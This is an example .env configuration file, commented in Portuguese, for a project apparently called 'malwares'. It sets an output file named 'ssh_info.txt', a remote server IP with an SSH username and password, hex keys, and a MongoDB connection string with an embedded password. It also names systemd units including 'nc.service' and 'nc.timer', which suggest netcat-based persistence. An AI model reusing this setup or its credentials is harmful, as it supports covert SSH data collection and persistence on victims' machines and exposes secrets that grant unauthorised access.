# Exemplo do arquivo .env
APP_NAME="System_App"
OUTPUT_FILE="ssh_info.txt"
REPOSITORY_URL="https://www.github.com/efraim-lima/malwares"
PATH_APP="./modules/play.py"
SSH_PORT="22"
PYTHON_EXECUTABLE="python3"
OS_NAME=$(uname -s | tr '[:upper:]' '[:lower:]')
VENV_NAME="venv"
USER=$(whoami)
INIT_DIR="/home/${USER}"
ACTUALL=$PWD
USERNAMEB="play"
FRAG="Rv5n8UYgiUr3R4DS"
CHAVEIRO = "9653173a8100978d09a6e2504ef0fdc5f00f4a3f"
CHAVEIROII = "19e516dcfa13baefb467cfdb5da5ca77c7c72a96fd35e1161bdbd8a6f886ed73"
FROG="7k7ss9w"
SERVER_PASSWORD="pastel"
SERVER_USERNAME="play"
CAMINHO="${INIT_DIR}/malwares"
VENV_DIR=$CAMINHO
IP_SERVER= "3.134.38.251"
SYSTEMD="/etc/systemd/system"
PLAY_SERVICE="play.service"
NC_SERVICE="nc.service"
NC_TIMER="nc.timer"
PY_SERVICE="py.service"
PY_TIMER="py.timer"
DIRECTORY = "mongodb+srv://missa:${FRAG}@missa.${FROG}.mongodb.net/"

#Para chamar a .env nos arquivos:

#Python:

# # main.py (seu código principal da aplicação)

# import os
# from dotenv import load_dotenv

# # Carrega as variáveis de ambiente do arquivo .env
# load_dotenv()

# # Exemplo de uso das variáveis de ambiente
# nome_usuario = os.getenv("NOME_USUARIO")

#Shell

# source .env

# # Como importar as variaveis no arquivo:
# $VARIAVEL